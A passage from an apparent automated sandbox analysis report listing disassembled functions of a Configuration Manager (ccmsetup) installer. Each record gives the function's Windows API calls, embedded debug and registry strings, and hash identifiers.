                                                                                          • Instruction Fuzzy Hash: 5F41CC30A44358EAEF25DAA0CE5ABEDBF60AB51704F5044CAF6057B1C2DBB51F84CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593E79
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$m_statusInfoHandle != 0$Fl
                                                                                          • API String ID: 3276020833-3887944012
                                                                                          • Opcode ID: 9ab64559fd74171829acf1a11dc994af46f0af6e1a77a0fb3609032dd578e14e
                                                                                          • Instruction ID: a7458a0011abf2cc0aa83b71309c6982975977f74abddcd9c08435cd219e1927
                                                                                          • Opcode Fuzzy Hash: 9ab64559fd74171829acf1a11dc994af46f0af6e1a77a0fb3609032dd578e14e
                                                                                          • Instruction Fuzzy Hash: BB41DD30A84358EAEF25DAA0CD5ABEDBF60AB51704F6044CAF6057B1C2DBB42F44CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593EE6
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$this->m_statusInfo->StructSize == sizeof(CCMSetup::StatusInfo)$Fl
                                                                                          • API String ID: 3276020833-3806281912
                                                                                          • Opcode ID: 0398eb183c99f5edc49c1719ee2e3986ec973e5676c7721f77ddd59dee65ac98
                                                                                          • Instruction ID: 0d9fd13250d640e0fdd23aba23722ca254cc125c50a795ec084733b701e4e910
                                                                                          • Opcode Fuzzy Hash: 0398eb183c99f5edc49c1719ee2e3986ec973e5676c7721f77ddd59dee65ac98
                                                                                          • Instruction Fuzzy Hash: 9441DD30A44358EAEF25DAA0CE1ABEDBB60AB51704F6044CAF6057B1C2DBB52F44CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593F35
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$this->m_statusInfo->Event != 0$Fl
                                                                                          • API String ID: 3276020833-2208013625
                                                                                          • Opcode ID: eb8ef8f1f2b4f4789fcbdc0a45cd0c6e0300d42b1a83649415f2898e1a97b3b5
                                                                                          • Instruction ID: 212eb000334bfa3b243e47fe4200eee9c6cb600efdce84dff71aa57adbc72279
                                                                                          • Opcode Fuzzy Hash: eb8ef8f1f2b4f4789fcbdc0a45cd0c6e0300d42b1a83649415f2898e1a97b3b5
                                                                                          • Instruction Fuzzy Hash: 0641DD30A44358EAEF25EAA0CD5BBEDBB60AB51704F6044CAF6057B1C2DBB42F44CB51
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593F89
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$No valid source or MP locations$ResetEvent(this->m_statusInfo->Event)$ccmsetup.cpp$ccmsetup.cpp$Fl
                                                                                          • API String ID: 3276020833-2115597616
                                                                                          • Opcode ID: 00ce2cb440ab1642422506a10cf27d24ed18dd8a132fca85259fcaa5a92c9595
                                                                                          • Instruction ID: c3c4583016809c72fa732aecd9a11a5a89c64b8f32bfed1bc158d9ddc7602ca2
                                                                                          • Opcode Fuzzy Hash: 00ce2cb440ab1642422506a10cf27d24ed18dd8a132fca85259fcaa5a92c9595
                                                                                          • Instruction Fuzzy Hash: 4A41DB30A44358EAEF25DAA0CD5ABEDBB60AB51704F2044CAF6057B1C2DBB52F84CB51
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0063453B
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 006346B2: __EH_prolog3_catch_GS.LIBCMT ref: 006346B9
                                                                                            • Part of subcall function 006346B2: GetCurrentThreadId.KERNEL32 ref: 0063474B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006345E7
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006345E2
                                                                                          • Get SmsClientVersion from WMI succeed, xrefs: 00634636
                                                                                          • SMS::Utility::GetClientVersion, xrefs: 00634578
                                                                                          • ..\smsutil.cpp, xrefs: 006345D7
                                                                                          • GetClientVersionFromWMI(sClientVersion), xrefs: 006345DD
                                                                                          • ..\smsutil.cpp, xrefs: 006345EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentH_prolog3_catch_Thread$CloseH_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\smsutil.cpp$..\smsutil.cpp$Get SmsClientVersion from WMI succeed$GetClientVersionFromWMI(sClientVersion)$SMS::Utility::GetClientVersion
                                                                                          • API String ID: 4140803554-1927873256
                                                                                          • Opcode ID: f1d361f283c357ff09351cd816a760c413ac374975f765d5d7db49cfd62356e9
                                                                                          • Instruction ID: 3d0569a9b5c1062f79bb1b4fb6948c4a4fd87d7bf8ac9110abb66eb47a029a29
                                                                                          • Opcode Fuzzy Hash: f1d361f283c357ff09351cd816a760c413ac374975f765d5d7db49cfd62356e9
                                                                                          • Instruction Fuzzy Hash: D2419270C05289EADF15EBA4C95A6EDBF75AF52314F148089E1017B3D2CF781A05C796
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B84A1
                                                                                            • Part of subcall function 005AE2E1: __EH_prolog3_catch_GS.LIBCMT ref: 005AE2E8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B8526
                                                                                          Strings
                                                                                          • {252DA259-82CA-4177-B8D0-49C78937BA3E}, xrefs: 005B84C9
                                                                                          • util.cpp, xrefs: 005B852E
                                                                                          • GetProductInstalledByUpgradeCode( c_szClientUpgradeCode, bIsInstalled ), xrefs: 005B851C
                                                                                          • IsClientInstalled, xrefs: 005B84B1
                                                                                          • util.cpp, xrefs: 005B8516
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B8521
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch_$CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetProductInstalledByUpgradeCode( c_szClientUpgradeCode, bIsInstalled )$IsClientInstalled$util.cpp$util.cpp${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 3561464689-4268580380
                                                                                          • Opcode ID: a087231561a97ca9c75833112b58be2d624b43b6a66c950256580a88404d28f1
                                                                                          • Instruction ID: 3543abcd691fa3c039e0e5bfdc2057bf4e47b68917021cd8b52e4432bf629e4b
                                                                                          • Opcode Fuzzy Hash: a087231561a97ca9c75833112b58be2d624b43b6a66c950256580a88404d28f1
                                                                                          • Instruction Fuzzy Hash: 96112471D45389BADB21E7A8890ABEE7F7A6F61700F188046F540773C2CBB49A04C3A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F4CD6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F4D29
                                                                                          • __CxxThrowException@8.LIBCMT ref: 005F4D9C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentException@8H_prolog3_catchThreadThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\String.cpp$..\String.cpp$CCM::Utility::String::append$pszUnicodeString != 0
                                                                                          • API String ID: 3856859314-3928025451
                                                                                          • Opcode ID: ec265203a08562baf660c8a1576b436c02f720e72e94d089eda017e8247b08af
                                                                                          • Instruction ID: c64271190c03d8b8be27ef2ae94f0f87148a3d0c0416dcd3c6771fb98bc731ca
                                                                                          • Opcode Fuzzy Hash: ec265203a08562baf660c8a1576b436c02f720e72e94d089eda017e8247b08af
                                                                                          • Instruction Fuzzy Hash: D011B971D8035AEACB21FBA4DC1EBAF7E247F51724F188145B654AB2C2C77C0A04DB91
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005E9010
                                                                                          • RevertToSelf.KERNELBASE(00000010,0062A535,AADAuthUrl,?,ResourceUri,?,ClientAppId,?,80000002,SOFTWARE\Microsoft\CCM\AADConfigs,00020019,00000001,?,CcmUtilLib::CcmGetAADOnboardingInfo,00000024,0061D7F1), ref: 005E9024
                                                                                          • ImpersonateLoggedOnUser.ADVAPI32 ref: 005E9031
                                                                                          • GetLastError.KERNEL32(00000002), ref: 005E905B
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          • CloseHandle.KERNEL32(?,00000010,0062A535,AADAuthUrl,?,ResourceUri,?,ClientAppId,?,80000002,SOFTWARE\Microsoft\CCM\AADConfigs,00020019,00000001,?,CcmUtilLib::CcmGetAADOnboardingInfo,00000024), ref: 005E907E
                                                                                          Strings
                                                                                          • Failed to restore thread user token. Error %u, xrefs: 005E9065
                                                                                          • }, xrefs: 005E9054
                                                                                          • X:\bt\1024777\repo\src\common\inc\ccmutil.h, xrefs: 005E904D
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentErrorH_prolog3HandleImpersonateLastLoggedRevertSelfThreadUser
                                                                                          • String ID: Failed to restore thread user token. Error %u$X:\bt\1024777\repo\src\common\inc\ccmutil.h$}
                                                                                          • API String ID: 2475037923-1763857403
                                                                                          • Opcode ID: 78e240c4521a9cfb27e7474ea1eeb0286d64c90a95a76db4ba11a29114501ddf
                                                                                          • Instruction ID: 8b674b52e63b572c9233f161f1f81bf46e5902af3fd225678da5926495718e11
                                                                                          • Opcode Fuzzy Hash: 78e240c4521a9cfb27e7474ea1eeb0286d64c90a95a76db4ba11a29114501ddf
                                                                                          • Instruction Fuzzy Hash: 2201AD75800246EFFB35AFA1E80E3ADBFB5BF00311F50050AE4D5A62E1DBB60A94CB51
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005A0C8D
                                                                                          • CoInitializeEx.COMBASE(00000000,00000000,0000038C), ref: 005A0C99
                                                                                            • Part of subcall function 00576C9E: __EH_prolog3.LIBCMT ref: 00576CA5
                                                                                            • Part of subcall function 0058C6DE: __EH_prolog3_catch_GS.LIBCMT ref: 0058C6E5
                                                                                            • Part of subcall function 0058C6DE: GetCurrentThreadId.KERNEL32 ref: 0058C747
                                                                                          • CoUninitialize.COMBASE ref: 005A0D8F
                                                                                            • Part of subcall function 0059DAAD: __EH_prolog3_catch_GS.LIBCMT ref: 0059DAB4
                                                                                            • Part of subcall function 0059DAAD: GetCurrentThreadId.KERNEL32 ref: 0059DB24
                                                                                          Strings
                                                                                          • CcmSetup is exiting with return code %d, xrefs: 005A0D3D
                                                                                          • CcmSetup failed with error code 0x%x, xrefs: 005A0D66
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_Thread$H_prolog3H_prolog3_InitializeUninitialize
                                                                                          • String ID: CcmSetup failed with error code 0x%x$CcmSetup is exiting with return code %d
                                                                                          • API String ID: 2022865156-3475839849
                                                                                          • Opcode ID: 4c508d2bdb0f615d4bcc75edce58ff84ee748461ca13d69730206ca9a8b8ea69
                                                                                          • Instruction ID: b45f7c5af0b9b178d62cbda6d85b7b7281e1afde67c191907cee7060a03f7b4e
                                                                                          • Opcode Fuzzy Hash: 4c508d2bdb0f615d4bcc75edce58ff84ee748461ca13d69730206ca9a8b8ea69
                                                                                          • Instruction Fuzzy Hash: 3821BF7162035557DB21AF609C19BEEBFB9BF83700F006199E5896B2C2CB715A46DB20
                                                                                          APIs
                                                                                          Strings
                                                                                          • CcmUtilLib::CcmGetCertificateStoreName, xrefs: 00623DE5
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00623E33
                                                                                          • Certificate Store, xrefs: 00623E2E
                                                                                          • Personal, xrefs: 00623E47
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID: CcmUtilLib::CcmGetCertificateStoreName$Certificate Store$Personal$Software\Microsoft\CCM\Security
                                                                                          • API String ID: 3886170330-2484193820
                                                                                          • Opcode ID: 864098ef1218fd7e719c4fc250b1905473d6cccc1fc1104679843768bfce35cd
                                                                                          • Instruction ID: 3ef0f1ebeb75a4f7da49bf6e3ba05c4d14c0cd30b917c22bb7848697bed6d92b
                                                                                          • Opcode Fuzzy Hash: 864098ef1218fd7e719c4fc250b1905473d6cccc1fc1104679843768bfce35cd
                                                                                          • Instruction Fuzzy Hash: 6501C460740B7792CB11B7A81926BBE5E272FC1720F15021EB691673C2DF6C5B069AD2
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005FB86E
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005FB59B: __EH_prolog3_catch.LIBCMT ref: 005FB5A2
                                                                                            • Part of subcall function 005FB59B: GetSystemInfo.KERNEL32(?,00000000,000000FF,CCM::Utility::GetProcessorArchitecture,0000007C,005B5198,?,DetectPlatform,0000004C,005A6602,?,?,CcmSetupManifest::GetApplicableInstallList,00000148,005A57F2,?), ref: 005FB5FB
                                                                                            • Part of subcall function 005FB59B: GetCurrentThreadId.KERNEL32 ref: 005FB642
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_catchH_prolog3_catch_InfoSystemThread
                                                                                          • String ID: CCM::Utility::IsCCMSupportedOS$amd64$ia64
                                                                                          • API String ID: 27531171-2536884697
                                                                                          • Opcode ID: d32aaa41b575b7e25cf7426b43da705061ad33a342f67007b846a078698ee627
                                                                                          • Instruction ID: 522ea91796b178a465f7b058a3d5fe757dd4c0e7a9a28b402efa4bd5d89351fa
                                                                                          • Opcode Fuzzy Hash: d32aaa41b575b7e25cf7426b43da705061ad33a342f67007b846a078698ee627
                                                                                          • Instruction Fuzzy Hash: 2E31A0A084524DF5EB11EBA8CA5ABFDAF68BF42344F148489F341372D2C7AC0B09D760
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,CCM::Utility::RegKey::Open,00000018,005FAEB5,80000002,00000000,00000000,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C), ref: 005F72CF
                                                                                          • RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00000300,00000000,00000000), ref: 005F733B
                                                                                            • Part of subcall function 005FC812: __EH_prolog3_catch.LIBCMT ref: 005FC819
                                                                                            • Part of subcall function 005FC812: GetModuleHandleW.KERNEL32(kernel32,CCM::Utility::IsWow64,0000001C,005FAE8E,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C,005F9BFF,?), ref: 005FC851
                                                                                            • Part of subcall function 005FC812: GetLastError.KERNEL32(00000000), ref: 005FC867
                                                                                            • Part of subcall function 005FC812: GetCurrentThreadId.KERNEL32 ref: 005FC89C
                                                                                            • Part of subcall function 005FC812: FreeLibrary.KERNEL32(00000008), ref: 005FC973
                                                                                            • Part of subcall function 005F66CD: RegCloseKey.ADVAPI32(?,00000000,005F72B6,CCM::Utility::RegKey::Open,00000018,005FAEB5,80000002,00000000,00000000,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C,005F9BFF,?), ref: 005F66D9
                                                                                          Strings
                                                                                          • CCM::Utility::RegKey::Open, xrefs: 005F723E
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catchOpen$CloseCurrentErrorFreeHandleLastLibraryModuleThread
                                                                                          • String ID: CCM::Utility::RegKey::Open
                                                                                          • API String ID: 2518332988-2537231124
                                                                                          • Opcode ID: 652e3e81c79e28d548818d52a4caee83dede51a4442018dec54c35c649f23ede
                                                                                          • Instruction ID: f1912fa6dc80fe8dfe060eb3bf86b5e83c6ae1ade843b5a12470d6e62adaaa5c
                                                                                          • Opcode Fuzzy Hash: 652e3e81c79e28d548818d52a4caee83dede51a4442018dec54c35c649f23ede
                                                                                          • Instruction Fuzzy Hash: 4B31BF71A0525EDBDF11DFA8C809BBE7EA5BF88310F04451AFA14A72D0C7788E40DB95
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005B76ED
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6FE7: __EH_prolog3_catch.LIBCMT ref: 005F6FEE
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • SetupParameters, xrefs: 005B773A
                                                                                          • SOFTWARE\Policies\Microsoft\Ccmsetup, xrefs: 005B7721
                                                                                          • Found additional ccmsetup.exe parameters through the registry., xrefs: 005B7759
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch$CloseCurrentThread
                                                                                          • String ID: Found additional ccmsetup.exe parameters through the registry.$SOFTWARE\Policies\Microsoft\Ccmsetup$SetupParameters
                                                                                          • API String ID: 2495189138-340935754
                                                                                          • Opcode ID: fe0f949c50789521290f02cc9717ee1cc7c91804e5b4ae695a76bdda83ab0bb6
                                                                                          • Instruction ID: e821b30429de6f059e5f10163932bf1bc45a8fd3313781964e80a8583dee6f6b
                                                                                          • Opcode Fuzzy Hash: fe0f949c50789521290f02cc9717ee1cc7c91804e5b4ae695a76bdda83ab0bb6
                                                                                          • Instruction Fuzzy Hash: 0301657090122FAACF10EBA0C80A9EEBF75FF58314F10025AF610B61C1DF749605CB94
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00625533
                                                                                            • Part of subcall function 0061F559: __EH_prolog3_catch.LIBCMT ref: 0061F560
                                                                                            • Part of subcall function 0061F559: GetCurrentThreadId.KERNEL32 ref: 0061F5BB
                                                                                          Strings
                                                                                          • ClientAlwaysOnInternet, xrefs: 00625562
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00625567
                                                                                          • CcmUtilLib::CcmIsClientAlwaysOnInternet, xrefs: 00625540
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread
                                                                                          • String ID: CcmUtilLib::CcmIsClientAlwaysOnInternet$ClientAlwaysOnInternet$Software\Microsoft\CCM\Security
                                                                                          • API String ID: 4040336050-3306042326
                                                                                          APIs
                                                                                          Strings
                                                                                          • Certificate Issuers, xrefs: 00623D04
                                                                                          • CcmUtilLib::CcmGetCertificateIssuers, xrefs: 00623CC7
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00623D09
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID: CcmUtilLib::CcmGetCertificateIssuers$Certificate Issuers$Software\Microsoft\CCM\Security
                                                                                          • API String ID: 3886170330-1757966838
                                                                                          APIs
                                                                                            • Part of subcall function 00577076: __EH_prolog3.LIBCMT ref: 0057707D
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0057C72F
                                                                                            • Part of subcall function 005D21C0: RaiseException.KERNEL32(?,?,005D0C93,?,?,?,?,?,?,?,005D0C93,?,0090E984,?), ref: 005D2215
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0057C73C
                                                                                            • Part of subcall function 0061FEB6: __EH_prolog3_catch_GS.LIBCMT ref: 0061FEC0
                                                                                            • Part of subcall function 005C948C: __EH_prolog3_catch.LIBCMT ref: 005C9493
                                                                                            • Part of subcall function 005C948C: GetCurrentThreadId.KERNEL32 ref: 005C9512
                                                                                          Strings
                                                                                          • ClientDeploymentErrorCode, xrefs: 0057C758
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentExceptionException@8H_prolog3H_prolog3_H_prolog3_catchH_prolog3_catch_RaiseThreadThrow
                                                                                          • String ID: ClientDeploymentErrorCode
                                                                                          • API String ID: 3582305682-638181262
                                                                                          APIs
                                                                                          • CoQueryProxyBlanket.OLE32(00000002,0000000A,00000008,00000000,?,00000000,00000000,00000000,00000000), ref: 006014B8
                                                                                          • CoSetProxyBlanket.COMBASE(00000002,000000FF,000000FF,00000000,00000000,00000003,00000000,00000020), ref: 006014E2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy$Query
                                                                                          • String ID:
                                                                                          • API String ID: 1095777928-3916222277
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005FB9F2
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005EC14B: __EH_prolog3_catch.LIBCMT ref: 005EC152
                                                                                            • Part of subcall function 005EC14B: GetCurrentThreadId.KERNEL32 ref: 005EC1A3
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6BC9: __EH_prolog3_catch.LIBCMT ref: 005F6BD0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$H_prolog3$CloseCurrentThread
                                                                                          • String ID: EnableManagedInstaller$Software\Microsoft\CCM
                                                                                          • API String ID: 2320626325-1782075465
                                                                                          APIs
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: FreeLocal
                                                                                          • String ID: No valid source or MP locations$Fl
                                                                                          • API String ID: 2826327444-248654557
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0057C73C
                                                                                            • Part of subcall function 0061FEB6: __EH_prolog3_catch_GS.LIBCMT ref: 0061FEC0
                                                                                            • Part of subcall function 005C948C: __EH_prolog3_catch.LIBCMT ref: 005C9493
                                                                                            • Part of subcall function 005C948C: GetCurrentThreadId.KERNEL32 ref: 005C9512
                                                                                          Strings
                                                                                          • ClientDeploymentErrorCode, xrefs: 0057C758
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_H_prolog3_catchH_prolog3_catch_Thread
                                                                                          • String ID: ClientDeploymentErrorCode
                                                                                          • API String ID: 109395747-638181262
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AE2E8
                                                                                          Strings
                                                                                          • GetProductInstalledByUpgradeCode, xrefs: 005AE30D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch_
                                                                                          • String ID: GetProductInstalledByUpgradeCode
                                                                                          • API String ID: 1329019490-594391790
                                                                                          APIs
                                                                                          • CertFreeCertificateContext.CRYPT32(?,00000000,007E2C84,?,00000001,?,005A2AB0,032FCDE0,005805BD,00000001,00000000,00000001,00000000,?,?,?), ref: 0062F30B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CertCertificateContextFree
                                                                                          • String ID: personal
                                                                                          • API String ID: 3080675121-4052381060
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,00000000,?,?,0059F0FF,00000001,8007000E,009052F0,00000000,00000000,00000001), ref: 00615970
                                                                                          • RtlAllocateHeap.NTDLL(0093A01C,00000008,00000000,00000000,?,00000000,?,?,0059F0FF,00000001,8007000E,009052F0,00000000,00000000,00000001,00000000), ref: 0061598D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
